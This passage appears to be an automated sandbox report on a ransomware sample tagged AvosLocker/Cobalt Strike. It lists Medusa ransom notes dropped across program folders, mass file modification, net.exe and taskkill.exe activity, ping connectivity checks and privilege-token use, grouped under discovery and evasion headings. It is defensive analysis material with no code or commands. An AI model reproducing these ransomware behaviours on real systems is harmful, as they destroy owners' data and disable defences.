File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-72_altform-unplated_contrast-high.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\AppIcon.targetsize-20_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft.NET\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ro.pak C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\LICENSE.DATA C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\RunningLate.scale-80.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\iheart-radio.scale-200.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\MSOSEC.XML C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Eye.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\he-il\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\limited\US_export_policy.jar C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-48_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\en-US\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\th-TH\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-36.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_et.json C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\TimerWideTile.contrast-white_scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-96_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwcapitalized.dotx C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-32_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\2.rsrc C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-80_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.INF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Microsoft Office\Updates\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-945322488-2060912225-3527527000-1000\{252E183E-B5F3-48C5-9D04-333C2BA77F7C} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
